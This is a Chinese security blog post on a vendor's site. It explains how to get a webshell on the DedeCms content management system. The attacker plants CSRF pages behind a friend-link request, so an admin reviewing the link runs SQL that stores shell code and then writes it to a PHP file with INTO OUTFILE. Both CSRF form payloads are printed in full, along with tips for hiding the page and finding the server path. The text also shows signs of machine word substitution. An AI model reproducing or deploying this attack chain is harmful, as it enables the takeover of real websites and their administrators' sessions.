DDOS防御专家-提供超强DDoS高防/CC防护/大流量清洗服务!
当前位置:主页 > WEB安全 > 正文

看看俺是怎样利用CSRF拿下Shell滴

09-17 WEB安全

织梦内容管理系统平台(DedeCms) 以简单、实用、开源而闻名,是国内最闻名的PHP开源网站管理系统平台,也是运用用户最多的PHP类CMS系统平台,在阅历多年的开展,目前的版本不管在功用,还是在易用性方面,都有了长足的开展和进步,DedeCms免费版的主要目标用户锁定在个人站长,功用更专心于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在运用本系统平台。
最近我在建立这个系统平台的时候偶然间发现了一个有趣的现象,织梦的后台竟然有一个能够直接履行SQL语句的功用,出于职业敏感,能直接履行SQL语句的当地往往会有一些缝隙。又经过一番查找发现了它后台存在一个CSRF的缝隙,一般情况下像这种缝隙都是不怎么能引起人们的关注的,毕竟是要经过交互才能起效果,而且起的效果还不大。以为到此就结束了吗?并不是。
这儿根本形不成一个有效的攻击链,不过我又发现了一个很有意思的当地,这个cms是能够在前台直接提交友链恳求的,那么问题来了?你提交了友链恳求管理员审阅的时候怎么可能不去阅读一下你的网站。于是有了下面的一套getshell的流程。
受影响的版本
实验环境 :win10,wamp
1.首先我们结构一个向数据库中刺进SHELL语句的恶意病毒木马页面
(这儿我屡次铲除cookie,屡次封闭阅读器进行测验发现,该页面的效果不受其他要素影响均可正常履行),这段代码的效果就是像数据库中刺进我们的shell code。
页面的代码如下:
html>    body>    form action="" method="POST">      input type="hidden" name="dopost" value="query" />      input type="hidden" name="querytype" value="2" />      input type="hidden" name="sqlquery" value="INSERT INTO dede_flink(id,sortrank,url,webname,msg,email,logo,dtime,typeid,ischeck)VALUES('1','1','www.baidu.com','1','','1','1','1','1','1');" />      input type="hidden" name="imageField.x" value="42" />      input type="hidden" name="imageField.y" value="17" />      input type="submit" value="Submit request" />    form>  body>html>
2.此刻我将该页面放置在我自己的服务器上
这儿就能够随便放置一个当地,为了更加形象,你能够在页面上做一些操作,比方加上JS代码使得管理员拜访页面的时候不会跳转,这样更神不知鬼不觉了。

看看俺是怎样利用CSRF拿下Shell滴


3.然后我去受害网站上提交一个友链恳求
将我自己网站上的恶意病毒木马页面链接填入。这个链接直接对应你结构好的恶意病毒木马页面。

看看俺是怎样利用CSRF拿下Shell滴


4.然后提交,等待管理员审阅
管理员审阅友链时定会检查友链所链接的内容。(管理员既然能够看到该链接证明此刻必定处于登陆状态)

看看俺是怎样利用CSRF拿下Shell滴


5.只要是管理员检查了我们恳求友链的链接那么就触发了恶意病毒木马代码的履行
此刻我们能够看到数据库中被刺进了恶意病毒木马代码。这儿的代码能够自定义,根据你想做的操作自定义就能够了。这儿我就是做实验,就是用了

看看俺是怎样利用CSRF拿下Shell滴


6.此刻不管管理员经过或许是不经过,我们的代码已经刺进
此刻我们结构生成shell的恶意病毒木马页面,页面代码如下,结构完成之后相同放在我们自己的服务器上。(这儿结构时,我们需要知道网站的途径,这儿知道相对途径或许时绝对途径都是能够的。途径的获取方法:一个网站的建立大多数采用 phpstudy wamp 或许原生态的在PHP下的www目录,这儿很好猜测。或许直接恳求一个网站上不存在的资源一般会爆出相对途径,或许去拜访一篇文章分析途径,再或许用AWVS直接拿到途径,反正这儿获取途径的方法特别多)
下面这段代码的效果是把我们刚刚刺进的shell code生成一个php页面。
html>    body>    form action="" method="POST">      input type="hidden" name="dopost" value="query" />      input type="hidden" name="querytype" value="2" />      input type="hidden" name="sqlquery" value="SELECT msg FROM dede_flink WHERE url="" INTO OUTFILE "../../../../www/dedecms/21111.php"" />      input type="hidden" name="imageField.x" value="38" />      input type="hidden" name="imageField.y" value="15" />      input type="submit" value="Submit request" />    form>  body>html>

版权保护: 本文由 DDOS防御专家 原创,转载请保留链接: http://sskjddosgb11.ddosgb.com//web/58.html

DDoS防御专家简介孤之剑
国内资深白帽子二十人组成员,前BAT资深网络安全工程师,知名网络安全站点板块大神,每年提交Google及微软漏洞,原sina微博负载插件开发者,现在整体防御复合攻击长期接受1-4.7T攻击,CC防护自主开发指纹识别系统,可以做到99.9999%的无敌防御。
  • 文章总数
  • 698415访问次数
  • 建站天数
  • 友情链接

    DDOS防御

    ddos防御

    cc防护

    web安全

    高防服务器

    高防cdn


    QQ客服

    400-0797-119

    X